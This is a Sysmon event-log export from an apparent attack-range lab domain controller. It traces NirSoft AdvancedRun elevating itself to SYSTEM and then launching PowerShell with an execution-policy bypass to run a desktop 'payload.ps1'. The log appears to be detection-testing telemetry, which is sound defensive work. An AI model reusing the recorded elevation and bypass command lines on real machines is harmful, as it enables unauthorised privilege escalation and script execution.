Sysmon event export, Channel=Microsoft-Windows-Sysmon/Operational, Computer=win-dc-mhaag-attack-range-139.attackrange.local, EventRecordID 4080527 through 4081255, 2022-01-21 20:17:51.475 to 20:18:02.352 UTC.

The original export ran every record's fields together without separators and listed records newest-first. They are reconstructed below with Sysmon's own field names, oldest-first by UtcTime (record ID in brackets). Values common to every record: Level=4, Opcode=0, Keywords=0x8000000000000000, RuleName=-. Event type to Version/Task: EID 1 Process Create 5/1; EID 5 Process Terminated 3/5; EID 7 Image Loaded 3/7; EID 10 Process Access 3/10. All UtcTime values fall on 2022-01-21.

Processes in this window:
  PID 4792  ProcessGuid={834264DD-14CE-61EB-9F08-000000002702}  C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe  User=ATTACKRANGE\Administrator  (its own Process Create record is not in this export)
  PID 3796  ProcessGuid={834264DD-14EF-61EB-A208-000000002702}  same image, User=NT AUTHORITY\SYSTEM, child of 4792
  PID 5972  ProcessGuid={834264DD-14F5-61EB-A308-000000002702}  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  User=ATTACKRANGE\Administrator, child of 4792

EID 7 lines give the loading ProcessId, then ImageLoaded, FileVersion, Description, OriginalFileName, Hashes and User. Unless noted otherwise: Product=Microsoft® Windows® Operating System, Company=Microsoft Corporation, Signed=true, Signature=Microsoft Windows, SignatureStatus=Valid. Records 4080530 through 4080581 all load into PID 3796 (Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe, User=NT AUTHORITY\SYSTEM).

[4080528] EID 10 ProcessAccess  UtcTime=20:17:51.475
  Source: {834264DD-DAE7-61EA-1700-000000002702} PID 1300 TID 3532 C:\Windows\System32\svchost.exe  SourceUser=NT AUTHORITY\SYSTEM
  Target: {834264DD-14EF-61EB-A208-000000002702} PID 3796 C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe  TargetUser=NT AUTHORITY\SYSTEM
  GrantedAccess=0x1fffff
  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\seclogon.dll+17dc|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

[4080527] EID 1 ProcessCreate  UtcTime=20:17:51.476
  ProcessGuid={834264DD-14EF-61EB-A208-000000002702}  ProcessId=3796
  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  FileVersion=1.50  Description=Run a program with different settings that you choose.  Product=AdvancedRun  Company=NirSoft  OriginalFileName=AdvancedRun.exe
  CommandLine="C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /SpecialRunSystem 41a9d8 4792
  CurrentDirectory=C:\Windows\system32\  User=NT AUTHORITY\SYSTEM
  LogonGuid={834264DD-DAE4-61EA-E703-000000000000}  LogonId=0x3e7  TerminalSessionId=2  IntegrityLevel=System
  Hashes=MD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8
  ParentProcessGuid={834264DD-14CE-61EB-9F08-000000002702}  ParentProcessId=4792
  ParentImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  ParentCommandLine="C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg -run
  ParentUser=ATTACKRANGE\Administrator

[4080529] EID 10 ProcessAccess  UtcTime=20:17:51.476
  Source: {834264DD-DAE4-61EA-0500-000000002702} PID 420 TID 436 C:\Windows\system32\csrss.exe  SourceUser=NT AUTHORITY\SYSTEM
  Target: PID 3796 AdvancedRun.exe  TargetUser=NT AUTHORITY\SYSTEM
  GrantedAccess=0x1fffff
  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f

[4080530] EID 7  20:17:51.488  PID 3796  C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe  1.50  Run a program with different settings that you choose.  Product=AdvancedRun  Company=NirSoft  OriginalFileName=AdvancedRun.exe  MD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8  Signed=true  Signature=Nir Sofer  SignatureStatus=Valid  User=NT AUTHORITY\SYSTEM
[4080531] EID 7  20:17:51.488  PID 3796  C:\Windows\System32\ntdll.dll  10.0.14393.4886 (rs1_release.220104-1735)  NT Layer DLL  ntdll.dll  MD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954C
[4080532] EID 7  20:17:51.488  PID 3796  C:\Windows\SysWOW64\ntdll.dll  10.0.14393.4886 (rs1_release.220104-1735)  NT Layer DLL  ntdll.dll  MD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3
[4080533] EID 7  20:17:51.489  PID 3796  C:\Windows\System32\wow64.dll  10.0.14393.3503 (rs1_release.200131-0410)  Win32 Emulation on NT64  wow64.dll  MD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5D
[4080534] EID 7  20:17:51.489  PID 3796  C:\Windows\System32\wow64win.dll  10.0.14393.3383 (rs1_release.191125-1816)  Wow64 Console and Win32 API Logging  wow64lg2.dll  MD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0
[4080535] EID 7  20:17:51.490  PID 3796  C:\Windows\System32\kernel32.dll  10.0.14393.4651 (rs1_release.210911-1554)  Windows NT BASE API Client DLL  kernel32  MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412F
[4080536] EID 7  20:17:51.490  PID 3796  C:\Windows\SysWOW64\kernel32.dll  10.0.14393.4651 (rs1_release.210911-1554)  Windows NT BASE API Client DLL  kernel32  MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1
[4080537] EID 7  20:17:51.495  PID 3796  C:\Windows\System32\kernel32.dll  10.0.14393.4651 (rs1_release.210911-1554)  Windows NT BASE API Client DLL  kernel32  MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412F
[4080538] EID 7  20:17:51.496  PID 3796  C:\Windows\System32\user32.dll  10.0.14393.4169 (rs1_release.210107-1130)  Multi-User Windows USER API Client DLL  user32  MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3
[4080539] EID 7  20:17:51.497  PID 3796  C:\Windows\System32\wow64cpu.dll  10.0.14393.3503 (rs1_release.200131-0410)  AMD64 Wow64 CPU  wow64cpu.dll  MD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82
[4080540] EID 7  20:17:51.498  PID 3796  C:\Windows\SysWOW64\kernel32.dll  10.0.14393.4651 (rs1_release.210911-1554)  Windows NT BASE API Client DLL  kernel32  MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1
[4080541] EID 7  20:17:51.498  PID 3796  C:\Windows\SysWOW64\KernelBase.dll  10.0.14393.4886 (rs1_release.220104-1735)  Windows NT BASE API Client DLL  Kernelbase.dll  MD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31

[4080542] EID 10 ProcessAccess  UtcTime=20:17:51.500
  Source: {834264DD-DAF8-61EA-5B00-000000002702} PID 4100 TID 4116 C:\Windows\system32\csrss.exe  SourceUser=NT AUTHORITY\SYSTEM
  Target: PID 3796 AdvancedRun.exe  TargetUser=NT AUTHORITY\SYSTEM
  GrantedAccess=0x1fffff
  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f

[4080543] EID 7  20:17:51.502  PID 3796  C:\Windows\SysWOW64\msvcrt.dll  7.0.14393.2457 (rs1_release_inmarket.180822-1743)  Windows NT CRT DLL  msvcrt.dll  MD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0B
[4080544] EID 7  20:17:51.504  PID 3796  C:\Windows\SysWOW64\user32.dll  10.0.14393.4169 (rs1_release.210107-1130)  Multi-User Windows USER API Client DLL  user32  MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8C
[4080545] EID 7  20:17:51.506  PID 3796  C:\Windows\SysWOW64\win32u.dll  10.0.14393.0 (rs1_release.160715-1616)  Win32u  Win32u.DLL  MD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62A
[4080546] EID 7  20:17:51.508  PID 3796  C:\Windows\SysWOW64\gdi32.dll  10.0.14393.4169 (rs1_release.210107-1130)  GDI Client DLL  gdi32  MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDF
[4080547] EID 7  20:17:51.508  PID 3796  C:\Windows\SysWOW64\version.dll  10.0.14393.0 (rs1_release.160715-1616)  Version Checking and File Installation Libraries  VERSION.DLL  MD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9
[4080548] EID 7  20:17:51.508  PID 3796  C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll  6.10 (rs1_release.210107-1130)  User Experience Controls Library  comctl32.DLL  MD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFD
[4080549] EID 7  20:17:51.508  PID 3796  C:\Windows\SysWOW64\userenv.dll  10.0.14393.4583 (rs1_release.210730-1850)  Userenv  userenv.dll  MD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7
[4080550] EID 7  20:17:51.509  PID 3796  C:\Windows\SysWOW64\combase.dll  10.0.14393.4886 (rs1_release.220104-1735)  Microsoft COM for Windows  COMBASE.DLL  MD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0
[4080551] EID 7  20:17:51.510  PID 3796  C:\Windows\SysWOW64\gdi32full.dll  10.0.14393.4886 (rs1_release.220104-1735)  GDI Client DLL  gdi32  MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084
[4080552] EID 7  20:17:51.510  PID 3796  C:\Windows\SysWOW64\rpcrt4.dll  10.0.14393.4886 (rs1_release.220104-1735)  Remote Procedure Call Runtime  rpcrt4.dll  MD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776C
[4080553] EID 7  20:17:51.510  PID 3796  C:\Windows\SysWOW64\ucrtbase.dll  10.0.14393.3659 (rs1_release_1.200410-1813)  Microsoft® C Runtime Library  ucrtbase.dll  MD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87
[4080554] EID 7  20:17:51.511  PID 3796  C:\Windows\SysWOW64\sspicli.dll  10.0.14393.4704 (rs1_release.211004-1917)  Security Support Provider Interface  security.dll  MD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8
[4080555] EID 7  20:17:51.511  PID 3796  C:\Windows\SysWOW64\comdlg32.dll  10.0.14393.4283 (rs1_release.210303-1802)  Common Dialogs DLL  comdlg32.dll  MD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909
[4080556] EID 7  20:17:51.511  PID 3796  C:\Windows\SysWOW64\cryptbase.dll  10.0.14393.0 (rs1_release.160715-1616)  Base cryptographic API DLL  cryptbase.dll  MD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891
[4080557] EID 7  20:17:51.512  PID 3796  C:\Windows\SysWOW64\bcryptprimitives.dll  10.0.14393.4770 (rs1_release.211101-1440)  Windows Cryptographic Primitives Library  bcryptprimitives.dll  MD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8
[4080558] EID 7  20:17:51.512  PID 3796  C:\Windows\SysWOW64\profapi.dll  10.0.14393.0 (rs1_release.160715-1616)  User Profile Basic API  PROFAPI.DLL  MD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873C
[4080559] EID 7  20:17:51.512  PID 3796  C:\Windows\SysWOW64\sechost.dll  10.0.14393.4886 (rs1_release.220104-1735)  Host for SCM/SDDL/LSA Lookup APIs  sechost.dll  MD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6
[4080560] EID 7  20:17:51.513  PID 3796  C:\Windows\SysWOW64\SHCore.dll  10.0.14393.4169 (rs1_release.210107-1130)  SHCORE  SHCORE.dll  MD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FA
[4080561] EID 7  20:17:51.514  PID 3796  C:\Windows\SysWOW64\shlwapi.dll  10.0.14393.4169 (rs1_release.210107-1130)  Shell Light-weight Utility Library  SHLWAPI.DLL  MD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95
[4080562] EID 7  20:17:51.515  PID 3796  C:\Windows\SysWOW64\shell32.dll  10.0.14393.4886 (rs1_release.220104-1735)  Windows Shell Common Dll  SHELL32.DLL  MD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763
[4080563] EID 7  20:17:51.515  PID 3796  C:\Windows\SysWOW64\cfgmgr32.dll  10.0.14393.0 (rs1_release.160715-1616)  Configuration Manager DLL  CFGMGR32.DLL  MD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97
[4080564] EID 7  20:17:51.516  PID 3796  C:\Windows\SysWOW64\windows.storage.dll  10.0.14393.4886 (rs1_release.220104-1735)  Microsoft WinRT Storage API  Windows.Storage.dll  MD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646
[4080565] EID 7  20:17:51.517  PID 3796  C:\Windows\SysWOW64\powrprof.dll  10.0.14393.0 (rs1_release.160715-1616)  Power Profile Helper DLL  POWRPROF.DLL  MD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489
[4080566] EID 7  20:17:51.517  PID 3796  C:\Windows\SysWOW64\advapi32.dll  10.0.14393.4886 (rs1_release.220104-1735)  Advanced Windows 32 Base API  advapi32.dll  MD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7
[4080567] EID 7  20:17:51.518  PID 3796  C:\Windows\SysWOW64\kernel.appcore.dll  10.0.14393.2312 (rs1_release.180607-1919)  AppModel API Host  kernel.appcore.dll  MD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69
[4080568] EID 7  20:17:51.519  PID 3796  C:\Windows\SysWOW64\ole32.dll  10.0.14393.4651 (rs1_release.210911-1554)  Microsoft OLE for Windows  OLE32.DLL  MD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294D
[4080569] EID 7  20:17:51.523  PID 3796  C:\Windows\SysWOW64\imm32.dll  10.0.14393.0 (rs1_release.160715-1616)  Multi-User Windows IMM32 API Client DLL  imm32  MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3

[4080570] EID 10 ProcessAccess  UtcTime=20:17:51.528
  Source: {834264DD-DAE4-61EA-0C00-000000002702} PID 652 TID 752 C:\Windows\system32\lsass.exe  SourceUser=NT AUTHORITY\SYSTEM
  Target: PID 3796 AdvancedRun.exe  TargetUser=NT AUTHORITY\SYSTEM
  GrantedAccess=0x1000
  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

[4080571] EID 10 ProcessAccess  UtcTime=20:17:51.529
  Same source (lsass.exe PID 652 TID 752), target (PID 3796), GrantedAccess=0x1000 and CallTrace as record 4080570.

[4080572] EID 10 ProcessAccess  UtcTime=20:17:51.530
  Source: {834264DD-14EF-61EB-A208-000000002702} PID 3796 TID 5672 C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe  SourceUser=NT AUTHORITY\SYSTEM
  Target: {834264DD-14CE-61EB-9F08-000000002702} PID 4792 C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe  TargetUser=ATTACKRANGE\Administrator
  GrantedAccess=0x10
  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1bb7|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+98fa|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)

[4080573] EID 7  20:17:51.532  PID 3796  C:\Windows\SysWOW64\wtsapi32.dll  10.0.14393.0 (rs1_release.160715-1616)  Windows Remote Desktop Session Host Server SDK APIs  wtsapi32.dll  MD5=55D5450C85C0A0DE8F2A22F2C0C816AE,SHA256=3CF7B03BEB7C47157C47EACEBFB731096468D1D25FF6784485EFD2FB806C4C5E
[4080581] EID 7  20:17:51.541  PID 3796  C:\Windows\SysWOW64\winsta.dll  10.0.14393.0 (rs1_release.160715-1616)  Winstation Library  winsta.dll  MD5=74261D485681A12AFF1AD517FD0EF200,SHA256=DEC3B7B1EBF3F7F4940FE63D665E2C50F6447C848C35C64B1BDE446E04358480

[4080574] EID 10 ProcessAccess  UtcTime=20:17:51.542
  Source: {834264DD-DAE6-61EA-0D00-000000002702} PID 876 TID 1012 C:\Windows\system32\svchost.exe  SourceUser=NT AUTHORITY\SYSTEM
  Target: PID 3796 AdvancedRun.exe  TargetUser=NT AUTHORITY\SYSTEM
  GrantedAccess=0x1400
  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

[4080575] EID 5 ProcessTerminated  UtcTime=20:17:51.544
  ProcessGuid={834264DD-14EF-61EB-A208-000000002702}  ProcessId=3796  Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe  User=NT AUTHORITY\SYSTEM

[4080604] EID 10 ProcessAccess  UtcTime=20:17:53.008
  Source: {834264DD-DB11-61EA-9500-000000002702} PID 428 TID 6008 C:\Windows\Explorer.EXE  SourceUser=ATTACKRANGE\Administrator
  Target: {834264DD-14CE-61EB-9F08-000000002702} PID 4792 C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe  TargetUser=ATTACKRANGE\Administrator
  GrantedAccess=0x1000
  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

[4080605] EID 10 ProcessAccess  UtcTime=20:17:53.008
  Same source (Explorer.EXE PID 428 TID 6008) and target (PID 4792), GrantedAccess=0x1000
  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

[4080606] EID 10 ProcessAccess  UtcTime=20:17:53.009
  Same source (Explorer.EXE PID 428 TID 6008) and target (PID 4792), GrantedAccess=0x1410
  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

[4080621] EID 10 ProcessAccess  UtcTime=20:17:57.462
  Source: {834264DD-14CE-61EB-9F08-000000002702} PID 4792 TID 1520 C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe  SourceUser=ATTACKRANGE\Administrator
  Target: {834264DD-14F5-61EB-A308-000000002702} PID 5972 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  TargetUser=ATTACKRANGE\Administrator
  GrantedAccess=0x1fffff
  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+d7f5c(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2878|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)

[4080620] EID 1 ProcessCreate  UtcTime=20:17:57.463
  ProcessGuid={834264DD-14F5-61EB-A308-000000002702}  ProcessId=5972
  Image=C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  FileVersion=10.0.14393.206 (rs1_release.160915-0644)  Description=Windows PowerShell  Product=Microsoft® Windows® Operating System  Company=Microsoft Corporation  OriginalFileName=PowerShell.EXE
  CommandLine="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoExit -executionpolicy bypass -File "c:\users\Administrator\desktop\payload.ps1"
  CurrentDirectory=C:\Windows\System32\  User=ATTACKRANGE\Administrator
  LogonGuid={834264DD-DB10-61EA-4958-090000000000}  LogonId=0x95849  TerminalSessionId=2  IntegrityLevel=High
  Hashes=MD5=65D86C34814C02569E2AD53FD24E7F61,SHA256=8133502266008B77DE7921451E1210B0EF3F0ED2DB7D8D3EE0C3350D856FA6FA
